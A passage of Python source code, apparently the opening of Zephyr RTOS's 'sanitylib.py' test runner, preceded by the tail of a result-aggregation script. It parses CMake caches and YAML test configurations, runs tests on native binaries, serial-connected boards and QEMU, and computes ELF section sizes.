while True:
try:
(msg, data) = result_queue.get(True, 1.0)
if msg == 'progress':
num_stat_file_processed += 1
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
elif msg == 'done':
aggregate_job_stats(agg_job_results, data)
append_csv(csv_data, data)
except queue.Empty:
all_jobs_done = True
for job in jobs:
if job.is_alive():
all_jobs_done = False
if all_jobs_done:
break
except KeyboardInterrupt:
sys.exit(1)
num_runs = agg_job_results['num_runs']
aggregating_end_time = time.perf_counter()
print()
print('Found {} runs in {}'.format(num_runs, format_elapsed_time(aggregating_end_time - aggregating_start_time)))
print()
close_csv(csv_data)
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
import traceback
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib # pylint: disable=unused-import
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial or i.get('serial_pty', None):
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None) or self.suite.west_runner
serial_pty = hardware.get('serial_pty', None)
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware['serial']
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# sanitycheck to judge testing result by console output
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
logger.debug(f"No timeout, return code from qemu: {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
logger.debug(f"return code from qemu: {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
